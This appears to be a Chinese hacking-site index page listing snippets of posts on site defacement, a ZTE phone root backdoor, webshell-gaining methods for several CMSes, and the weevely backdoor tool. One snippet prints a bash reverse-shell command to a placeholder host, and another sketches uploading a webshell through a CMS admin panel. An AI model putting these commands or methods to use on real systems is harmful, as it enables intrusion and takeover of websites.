黑客江湖恩怨 竟干违法事栽赃? 嚣张黑了教育部网站 还大方留名 前日晚,微博中有消息称教育部门户网站被黑,页面被黑客篡改。而微博认证资料为信息安全资深人士的陈诚提供了截图。在截图中显示,黑...
中兴(ZTE)手机存在后门,可获得 Root Shell
转自:http://www.landofdroid.com/2012/security-zte-phones-root-backdoor/ It’s appearing that a root bac...
114啦网址导航v1.15后台拿shell
By:yiz 我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。 后台 点击模块管理--->分类模块-->添加模块 直接添加后缀为php或asp的 都可以 内容就是马的...
知科地方门户网站管理系统前台getshell
Author:西_决 小菜第一次发帖,大牛脚下留情啊! 注册会员 ---》 发布文章 ---》 写日志的编辑器fck 浏览服务器 二次上传 证明: 文章来源于lcx.cc:知科地方门户网站管...
Thinksns 2.5 getshell
根目录 thumb.php 看代码
PHP后门生成工具weevely分析
唐门三少 发表于 2012-10-19 11:07 最近闲的蛋疼,玩了下weevely这个工具,感觉还是蛮强大的,防查杀,连接也是加密的。感兴趣的朋友看正文吧。 0x01 摘要 weevely是一款针...
反弹shell的十种姿势(偶然看到一些整理下)
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意某些linux不支持 perl版本: perl -e 'use Sock...
【医疗行业预警】一些大牛收医院官网的shell 有什么用 求科普
一些大牛收医院官网的shell 有什么用 求科普 Ph4nt0m | 2013-07-29 17:32 像一些暴力的电视广告产品的数据收的话能理解。盗单之类的。像一些数据库没什么用的,但是关键词来路比...
帝国cms最新版本后台拿webshell方法
自定义页面-增加自定义页面-随便写了xxx.php文件名,页面内容填写,如果内容直接添一句话或者php大马是无用的,,因为他会生成xxx.php前先给你执行!!
DiscuzX系列后台GETSHELL附方法
DiscuzX 系列后台GETSHELL附方法 作者 mOon www.moonsec.com 最近不少学员来问道 dzx 后台怎么拿WEBSHELL。
ECSHOP最新后台GETSHELL
ECSHOP最新后台GETSHELL 漏洞 首发应该是wooyun 的vip同学 这几天在一个小到不能再小的项目里面确起到了一个很大的作用。
关于js拿shell的尝试
以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。 当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等...
3